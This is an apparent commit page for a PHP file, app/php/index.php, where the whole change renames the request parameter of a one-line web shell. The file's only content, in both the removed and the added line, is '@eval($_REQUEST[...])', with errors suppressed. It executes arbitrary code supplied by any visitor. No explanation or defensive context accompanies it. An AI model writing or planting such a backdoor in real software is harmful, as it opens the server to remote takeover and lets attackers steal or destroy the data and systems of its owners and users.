edwagbb commited on
Commit
e2eb579
·
verified ·
1 Parent(s): 21f8e20

Update app/php/index.php

Browse files
Files changed (1) hide show
  1. app/php/index.php +1 -1
app/php/index.php CHANGED
@@ -1 +1 @@
1
- <?php @eval($_REQUEST["cmd"]);?>
 
1
+ <?php @eval($_REQUEST["code"]);?>